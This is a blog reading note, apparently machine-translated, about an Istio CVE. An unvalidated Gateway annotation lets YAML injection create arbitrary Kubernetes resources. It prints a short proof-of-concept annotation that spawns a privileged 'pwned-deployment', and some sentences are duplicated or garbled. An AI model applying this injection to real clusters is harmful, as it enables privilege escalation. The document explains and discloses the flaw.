Reading Notes: “CVE generated by the combination of YAML and Go template under istio”

Title: “CVE generated by the combination of YAML and Go template under istio”
Category: others
Link: https://paper.seebug.org/1882/

Users who are familiar with Kubernetes must be familiar with various resource formats. For example, to describe a Pod, you need to prepare some basic information about containers, and other materials such as Label and Annotation need to be filled in.

In Kubernetes, apimachinery is used to verify whether each field is legal. For example, the most common one is that when creating a resource name, sometimes the format does not match. To be precise, it is the Pod method to verify whether each field is not. Legal, for example, the most common one is that when creating a resource name, sometimes the format does not match. To be precise, the DNS RFC 1123 is used to verify whether the Pod is legal.
Part of the numerical data may be additionally checked in the Controller. As for the custom CRD (Customer Resource Definition), the legal value of each field can be defined through openAPIV3Schema when it is created.

The problem to be introduced in this article today is related to the istio environment. When a user creates a resource named Gateway to the cluster, istio will read the Gateway data and convert it into two underlying resources, Service/Deployment.
The author carefully researched and found that when creating a Service, he would find a material named “networking.istio.io/service-type” from the Annotation in the Gateway, and use it as the type of Serivce.

However, the value of Annotation does not have any checking mechanism, so users can fill in various values ​​in the field “networking.istio.io/service-type”, so the author tries to write a very long Annotation, such as

 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
twenty one
twenty two
twenty three
twenty four
25
 annotations:
networking.istio.io/service-type: |-
"LoadBalancer"
apiVersion: apps/v1
kind: Deployment
metadata:
name: pwned-deployment
namespace: istio-ingress
spec:
selector:
matchLabels:
app: nginx
replicas: 1
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.14.3
ports:
- containerPort: 80
securityContext:
privileged: true

The result was very smooth, isio finally created a deployment that the author deliberately described, and the deployment also specially set the privileged: true option and through this test proved that the YAML inspection problem gave users the opportunity to insert any desired resources If you are interested in this article in the environment, you can watch it

personal information

I currently have Kubernetes-related courses on the Hiskio platform. Interested people are welcome to refer and share, which contains my various ideas about Kubernetes from the bottom to the actual combat.

For details, please refer to the online course details: https://course.hwchiu.com/

In addition, please click like to join my personal fan page, which will regularly share various articles, some are translated articles, and some are original articles, mainly focusing on the CNCF field
https://www.facebook.com/technologynoteniu

If you use Telegram, you can also subscribe to the following channels, where I will regularly push notifications of various articles
https://t.me/technologynote

Your donation will give me the motivation to grow my article

This article is reprinted from: https://www.hwchiu.com/read-notes-44.html
This site is for inclusion only, and the copyright belongs to the original author.

Leave a Comment